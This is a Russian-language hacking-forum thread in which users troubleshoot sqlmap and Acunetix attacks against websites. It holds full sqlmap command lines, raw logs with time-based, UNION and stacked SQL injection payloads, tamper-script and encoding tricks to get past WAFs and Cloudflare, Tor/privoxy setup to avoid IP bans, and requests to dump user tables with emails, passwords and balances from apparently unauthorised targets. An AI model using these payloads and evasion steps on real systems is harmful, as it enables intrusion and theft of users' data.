помогите плиз

пипл сори что не по теме , не могу найти нужную.. и я и много людей тут спрашивали по поводу уязвимостей сканом из Acunetix . Пожалуйста подскажите как через прокси пустить скан , ну что бы не банило ип при скане и не зависал скан, я имею в виду в веб. Извиняюсь еще раз что не в этой теме , подскажите пожалуйста.

кто нибудь знает как можно обойти фильтры на ()?

it appears that some non-alphanumeric characters (i.e. ()) are filtered by the back-end server.

LeninDie said:
↑ (https://antichat.live/posts/4435920/)
подскажите что написать в коде темпера для того чтоб он при запросах менял select на %53%45%4c%45%43%54
я попробовал сделать вот так.


Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела?


LeninDie said:
↑ (https://antichat.live/posts/4436689/)
кто нибудь знает как можно обойти фильтры на ()?
it appears that some non-alphanumeric characters (i.e. ()) are filtered by the back-end server.


Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38

Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('

fandor9 said:
↑ (https://antichat.live/posts/4436746/)
Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела?
Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38
Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('


Спасибо, попробовал, но к сожалению не помогло. Может быть есть еще какие то варианты?

fandor9 said:
↑ (https://antichat.live/posts/4428544/)
Насколько я понимаю, это звания баз данных в неправильной
кодировке (https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_character_set_database)
.
Можете посмотреть используемую кодировку с помощью

Code:
SELECT SCHEMA_NAME 'database', default_character_set_name 'charset', DEFAULT_COLLATION_NAME 'collation' FROM information_schema.SCHEMATA;



А как быть когда dbms = INFORMIX ?

https://prnt.sc/w9vw7e

https://prnt.sc/w9vw7e

2. Какие на сегодня существуют методы обхода AKAMAI ?

ПЫСЫ: fandor9 ,случаем платных консультаций не оказываете?

Gigggs said:
↑ (https://antichat.live/posts/4436634/)
пипл сори что не по теме , не могу найти нужную.. и я и много людей тут спрашивали по поводу уязвимостей сканом из Acunetix . Пожалуйста подскажите как через прокси пустить скан , ну что бы не банило ип при скане и не зависал скан, я имею в виду в веб. Извиняюсь еще раз что не в этой теме , подскажите пожалуйста.


Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала

1)Если нужна работа через тор

качаем privoxy_3.0.28

правим конфиг

forward-socks5t / 127.0.0.1:9150 .

forward-socks4 / 127.0.0.1:9150 .

forward-socks4a / 127.0.0.1:9150 .

12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy

и меняем на 127.0.0.1 порт 8118

13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)

Проверить работу можно отключив тор- сайт не будет сканится.

========================

чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор

Server tests:

Apache Tomcat AJP protocol audit

JMX and RMI

Java Debug Wire Protocol (JDWP) audit

Open SSL TLS Heartbleed

PHP Hash Collision DOS

TLS/SSL audit

Target Tests:

Apache Cassandra

FastGI Unauthorized Access

Memcached

Oracle Weblogic T3 XXE

Redis Unath

webLogic RCE

Apache Log4j socket

uWSGI

UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.

Подскажите пожалуйста в чем может быть проблема..

retrieving таблиц с начало норм шло

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Parameter: sort_by (POST)

Type: boolean-based blind

Title: Boolean-based blind - Parameter replace (original value)

5:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_tracking_visits_today

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 10

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_widgets

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 19

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: ai_widgets_comments

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: 9

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] resumed: b?ppd?pp?

[15:06:37] [DEBUG] performed 0 queries in 0.00 seconds

[15:06:37] [INFO] retrieving the length of query output

[15:06:37] [INFO] resumed: b?ppd?pp?

А потом вот такая вот хрень пошла resumed: b?ppd?pp?

[15:11:36] [PAYLOAD] (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x687564736f6e61745f6169 LIMIT 62,1),10,1))>57) THEN 0x6966286e6f7728293d7379736461746528292c736c656570 2830292c3029 ELSE (SELECT 8755 UNION SELECT 5075) END))

[15:11:38] [INFO] retrieved: b?ppd?pp?

Заранее спасибо.

Приветствую

Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

polzunki said:
↑ (https://antichat.live/posts/4444082/)
Приветствую
Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "
https://site.com
" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs
View attachment 12400 (https://antichat.live/attachments/12400.img)


Используй прокси, пусти трафик через ТОР

Попробуй с того же IP, но почисти куки.

Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id

Мой запрос


Code:
users -C id,email,password,money --dump

Мне допустим надо юзер с ID 123

Duble said:
↑ (https://antichat.live/posts/4445956/)
Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
Мой запрос

Code:
users -C id,email,password,money --dump

Мне допустим надо юзер с ID 123




karkajoi said:
↑ (https://antichat.live/posts/4331557/)
--where="email='
admin@admin.com (mailto:admin@admin.com)
'" так будет работать




joelblack said:
↑ (https://antichat.live/posts/4333222/)

Code:
--where "id IN (1,3)"

[12:51:44] [INFO] fetching database names

[12:51:44] [INFO] fetching number of databases

[12:51:44] [PAYLOAD] -3870

you provided a HTTP Cookie header value, while target URL provides its own cooki

es within HTTP Set-Cookie header which intersect with yours. Do you want to merg

e them in further requests? [Y/n] Y

[12:51:44] [DEBUG] used the default behavior, running in batch mode

[12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN

[12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN

[12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema

_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN

[12:51:54] [INFO] retrieved:

[12:51:54] [INFO] retrieved:

Кто сталкивался?

[12:51:44] [DEBUG] used the default behavior, running in batch mode


Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:


Code:
sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex

Code:
[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times

ending @ 19:29:32 /2021-02-19/

В чем проблема?


Code:
--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch --hex --drop-set-cookie --text-only

До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.

Подскажите как быть?

https://sun9-12.userapi.com/impg/6NkVP7p2AM2ziVj5tMXl-PBhI4GGJlw6GApu-A/AtNx3-0bf1k.jpg?size=1093x333&quality=96&proxy=1&sign=fcf19c3257dbc42988ec8b0f3b6e9f0a&type=album

Не обнаруживает базы данных

https://sun9-54.userapi.com/impg/oqwLIKa0UuQ69RIWn8KS_N2ElcmaOmRcMw5Aag/iENdpe7N6d8.jpg?size=1100x505&quality=96&proxy=1&sign=6887ffaccf6f09655376e0332391271b&type=album

Duble said:
↑ (https://antichat.live/posts/4447318/)

Code:
[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times

ending @ 19:29:32 /2021-02-19/

В чем проблема?

Code:
--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch --hex --drop-set-cookie --text-only

До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
Подскажите как быть?
https://sun9-12.userapi.com/impg/6NkVP7p2AM2ziVj5tMXl-PBhI4GGJlw6GApu-A/AtNx3-0bf1k.jpg?size=1093x333&quality=96&proxy=1&sign=fcf19c3257dbc42988ec8b0f3b6e9f0a&type=album
Не обнаруживает базы данных
https://sun9-54.userapi.com/impg/oqwLIKa0UuQ69RIWn8KS_N2ElcmaOmRcMw5Aag/iENdpe7N6d8.jpg?size=1100x505&quality=96&proxy=1&sign=6887ffaccf6f09655376e0332391271b&type=album


Теперь ищи реальный ИП сайта.Смотри DNS записи

Здравствуйте. Есть ссылка вида: http://site.com/index.php?id=image/quickview&host_id=2352

При запуске этой команды:


Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352" --proxy-file=C:\proxy.txt --threads=10 --timeout=180 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment,space2hash,space2 mysqlblank" --level 5 --risk 3 --dbs

Тамперы подставляются к image/quickview

Возможно ли как-то указать мапе, чтобы проверка шла черезhost_id=2352?

@polzunki (https://antichat.live/members/361615/)

* - указатель точки инъекции


Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah

ms13 said:
↑ (https://antichat.live/posts/4448470/)
@polzunki (https://antichat.live/members/361615/)
* - указатель точки инъекции

Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah



Благодарю. Вроде получилось, но по итогу получаю это:

http://dl4.joxi.net/drive/2021/03/01/0044/2814/2927358/58/f23c2adac1.jpg

URI parameter '#1*' is not injectable


Откуда берётся #1, если этого нет в таргете?

polzunki said:
↑ (https://antichat.live/posts/4448492/)
Откуда берётся #1, если этого нет в таргете?


это означает, что в указанном параметре под номером 1 нет инъекции, то есть с помощью * можно указывать несколько параметров.

а если вы хотите увидеть, что отправляется в запросах, то добавьте ключ -v- Уровень вербальности: 1-6 (по умолчанию 1)

но лучше начните с мануала программы ( он есть и на русском ) или даже с этого! (https://habr.com/ru/post/501442/)

Cорян за возможно глупый вопрос, просто не сталкивался со скулей в куках.

Как правильно кормить мапу?


content_copyGET /pr/110 HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Cookie: __cfduid=d98d5bb0d7fe33de10e5507d3ab069d8f16145126 99;PHPSESSID=duh4mooe1nue85unesnfmpdir5;nova=hryhv dn5lco00000000000000000000;cf_ob_info=520:628a0e9e 19008b4a:KBP'%20RLIKE%20(SELECT%20(CASE%20WHEN%20( 1%2B1-2%2B000610=2%2B2-4%2B000610)%20THEN%201%20ELSE%200x28%20END))%20--%20;cf_use_ob=0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: site.com
Connection: Keep-alive

Подскажите в чем проблема?


sqlmap --level 5 --risk 3 --random-agent --threads 1 --url "
https://site.su/ajax/ajax.php
" --batch --time-sec=400 -v 3 --hex --data="arr[hours]=19&arr[id_film]=10166*&arr[minutes]=44&
method=1.32" --tamper=space2comment,randomcase --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.3.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting @ 13:04:44 /2021-03-07/
[13:04:44] [DEBUG] cleaning up configuration parameters
[13:04:45] [INFO] loading tamper module 'space2comment'
[13:04:45] [INFO] loading tamper module 'randomcase'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[13:04:45] [DEBUG] used the default behavior, running in batch mode
[13:04:45] [INFO] loading tamper module 'space2dash'
[13:04:45] [DEBUG] setting the HTTP timeout
[13:04:45] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (Windows NT 5.0; U; en)' from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [DEBUG] creating HTTP requests opener object
[13:04:46] [DEBUG] setting the HTTP Referer header to the target URL
[13:04:46] [DEBUG] setting the HTTP Host header to the target URL
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[13:04:46] [DEBUG] used the default behavior, running in batch mode
[13:04:47] [INFO] resuming back-end DBMS 'mysql'
[13:04:47] [DEBUG] resolving hostname 'site.su'
[13:04:48] [INFO] testing connection to the target URL
[13:04:52] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: arr[hours]=19&arr[id_film]=10166' AND SLEEP(400) AND 'kNCw'='kNCw&arr[minutes]=44&method=1.32
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:04:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.16.1, PHP 7.3.16
back-end DBMS: MySQL >= 5.0.12
[13:04:52] [INFO] fetching database names
[13:04:52] [INFO] fetching number of databases
[13:04:52] [PAYLOAD] 10166
[13:04:53] [INFO] resumed: ?\xff
[13:04:53] [DEBUG] performed 0 queries in 0.03 seconds
[13:04:53] [ERROR] unable to retrieve the number of databases
[13:04:53] [INFO] falling back to current database
[13:04:53] [INFO] fetching current database
[13:04:53] [PAYLOAD] 10166'/**/aND/**/7166=If((orD(Mid((heX(IfNULL(cAsT(DAtABAsE()/**/As/**/CHaR),0x20))),1,1))>66),SLEEp(400),7166)/**/aND/**/'TrEu'='TrEu
[13:04:53] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[13:05:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:05:21] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRd(MId((HeX(iFNULL(caSt(DATAbAsE()/**/aS/**/chAR),0x20))),1,1))>52),sLEEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:05:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:05:51] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(CAst(DAtAbAse()/**/As/**/ChaR),0x20))),1,1))>56),sleEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:06:22] [PAYLOAD] 10166'/**/And/**/7166=iF((oRD(mID((Hex(iFNULL(caST(daTabaSe()/**/As/**/CHaR),0x20))),1,1))>64),slEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:06:54] [PAYLOAD] 10166'/**/aNd/**/7166=iF((orD(miD((hEX(iFNULL(CAsT(daTAbase()/**/aS/**/ChaR),0x20))),1,1))>65),SleEp(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:07:24] [PAYLOAD] 10166'/**/aND/**/7166=iF((Ord(Mid((hEx(iFNULL(caSt(daTABaSE()/**/aS/**/Char),0x20))),1,1))!=66),SleeP(400),7166)/**/aND/**/'TrEu'='TrEu
[13:07:58] [ERROR] invalid character detected. retrying..
[13:07:58] [PAYLOAD] 10166'/**/aNd/**/7166=iF((Ord(MId((Hex(iFNULL(CAst(DatAbaSE()/**/aS/**/cHAR),0x20))),1,1))>66),SleEP(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:08:32] [PAYLOAD] 10166'/**/And/**/7166=iF((ORd(mId((Hex(iFNULL(cAst(databaSE()/**/As/**/cHAr),0x20))),1,1))>97),sLEEp(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:12] [PAYLOAD] 10166'/**/And/**/7166=If((Ord(MiD((heX(IfNULL(CAst(DataBAsE()/**/As/**/ChAR),0x20))),1,1))>101),SlEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:43] [PAYLOAD] 10166'/**/And/**/7166=If((oRd(MId((hEx(IfNULL(casT(dAtabAse()/**/As/**/cHAR),0x20))),1,1))>119),slEEP(400),7166)/**/And/**/'TrEu'='TrEu
[13:10:14] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(caST(dAtABasE()/**/aS/**/ChAr),0x20))),1,1))>120),sLeEP(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:10:44] [INFO] retrieved:
[13:10:44] [DEBUG] performed 11 queries in 351.53 seconds
[13:10:44] [CRITICAL] unable to retrieve the database names
ending @ 13:10:44 /2021-03-07/

Duble said:
↑ (https://antichat.live/posts/4449647/)
Подскажите в чем проблема?


Сделай логирование в файл ( -t logfile.txt) и руками проверь запросы, может WAF на database() срабатывает

Приветствую. подскажите что не дает далее базу размотать.

Database: mysql

Table: Organization

[18 columns]

+------------------+---------+

| Column | Type |

+------------------+---------+

| aa | numeric |

| auid | numeric |

| chromosome_id | numeric |

| e_postaadres | numeric |

| evadres | numeric |

| fjalekalimi | numeric |

| ip | numeric |

| isbn | numeric |

| lastpost | numeric |

| main_module | numeric |

| mot_de_passe_bdd | numeric |

| myname | numeric |

| namaakun | numeric |

| ordernumber | numeric |

| parola | numeric |

| plugin_id | numeric |

| s_id | numeric |

| usr_n | numeric |

+------------------+---------+

sqlmap -u "https://10.10.10.10/index.php?action=login&controller=User" --host="site.test.com" --data="login=1'&password=g00dPa%24%24w0rD" --dbms=mysql -p login --risk 3 --random-agent -D mysql -T Organization -C mot_de_passe_bdd,parola,usr_n,s_id,e_postaadres,ip ,lastpost -v3 --dump

выкидывает;

[13:50:52] [PAYLOAD] 1' AND (SELECT 9734 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM mysql.Organization),1,1))>9,0,5)))))yXMR)-- bIfc

[13:50:52] [INFO] retrieved:

[13:50:52] [DEBUG] performed 3 queries in 18.58 seconds

[13:50:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[13:50:52] [WARNING] unable to retrieve the number of column(s) 'e_postaadres,ip,lastpost,mot_de_passe_bdd,parola, s_id,usr_n' entries for table 'Organization' in database 'mysql'

[13:50:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.10'

ending @ 13:50:52 /2021-03-22/

до таблиц дошел, а с колонками проблема . и подставлял --no-cast' or switch '--hex' идр.

Payload руками перебирать ,пока не сильно понимаю. прошу помощь

Добрый день! Подскажите плс в чем может быть проблема?


Code:
sqlmap.py --random-agent -u "http://site.com/ShoppingPage.asp?CateID=7" -v 3 --batch -D SkhlmcPTBankDB --dump --no-cast --tamper=between,randomcase,space2comment,luanginx --time-sec=10 --threads=10

Получаю следующие


Code:
[03:59:00] [DEBUG] cleaning up configuration parameters
[03:59:00] [INFO] loading tamper module 'between'
[03:59:00] [INFO] loading tamper module 'randomcase'
[03:59:00] [INFO] loading tamper module 'space2comment'
[03:59:00] [INFO] loading tamper module 'luanginx'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[03:59:00] [DEBUG] used the default behavior, running in batch mode
[03:59:00] [WARNING] using too many tamper scripts is usually not a good idea
[03:59:00] [DEBUG] setting the HTTP timeout
[03:59:00] [DEBUG] setting the HTTP User-Agent header
[03:59:00] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)' from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [DEBUG] creating HTTP requests opener object
[03:59:02] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:59:02] [DEBUG] resolving hostname 'eshop.antibac-intl.com'
[03:59:02] [INFO] testing connection to the target URL
[03:59:03] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQCTCBDAQ=BEHFEANBBCL...JDFNEOLDOF'). Do you want to use those [Y/n] Y
[03:59:04] [DEBUG] used the default behavior, running in batch mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CateID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CateID=7' AND 4290=4290 AND 'EMyv'='EMyv
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: CateID=7' AND 1088 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+ (SELECT (CASE WHEN (1088=1088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR (113))) AND 'AjKx'='AjKx
Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: CateID=7';WAITFOR DELAY '0:0:10'--
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: CateID=7' WAITFOR DELAY '0:0:10'--
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: CateID=7' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+ CHAR(98)+CHAR(120)+CHAR(113)+CHAR(69)+CHAR(111)+CH AR(72)+CHAR(84)+CHAR(86)+CHAR(122)+CHAR(108)+CHAR( 74)+CHAR(103)+CHAR(102)+CHAR(101)+CHAR(111)+CHAR(1 19)+CHAR(67)+CHAR(87)+CHAR(99)+CHAR(88)+CHAR(108)+ CHAR(97)+CHAR(115)+CHAR(101)+CHAR(65)+CHAR(66)+CHA R(116)+CHAR(85)+CHAR(119)+CHAR(88)+CHAR(115)+CHAR( 70)+CHAR(84)+CHAR(112)+CHAR(71)+CHAR(89)+CHAR(85)+ CHAR(82)+CHAR(83)+CHAR(98)+CHAR(118)+CHAR(109)+CHA R(109)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHA R(113),NULL,NULL-- jDXf
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
---
[03:59:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:59:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[03:59:04] [INFO] fetching tables for database: SkhlmcPTBankDB
[03:59:06] [DEBUG] resuming configuration option 'string' ('HK')
[03:59:06] [PAYLOAD] 7'/**/Union/**/AlL/**/SEleCT/**/nULl,nULl,nULl,nULl,nULl,nULl,ChaR(113)+ChaR(107)+ ChaR(98)+ChaR(120)+ChaR(113)+(SEleCT/**/SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBan kDB..sysobjects.name/**/As/**/table_name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/innER/**/joiN/**/SkhlmcPTBankDB..sysusers/**/oN/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sys users.uid/**/wHeRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))/**/FOr/**/JSoN/**/AUTO,/**/iNCLUDE_nULl_VALUES)+ChaR(113)+ChaR(112)+ChaR(112) +ChaR(107)+ChaR(113),nULl,nULl--/**/pqUM
[03:59:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:07] [PAYLOAD] 7'/**/UniOn/**/aLl/**/sElecT/**/nuLl,nuLl,nuLl,nuLl,nuLl,nuLl,ChaR(113)+ChaR(107)+ ChaR(98)+ChaR(120)+ChaR(113)+COUNt(SkhlmcPTBankDB. .sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects .name/**/aS/**/table_name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107 )+ChaR(113),nuLl,nuLl/**/frOM/**/SkhlmcPTBankDB..sysobjects/**/inNEr/**/Join/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sys users.uid/**/wHERE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))--/**/OJqX
[03:59:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:08] [WARNING] the SQL query provided does not return any output
[03:59:08] [PAYLOAD] 7
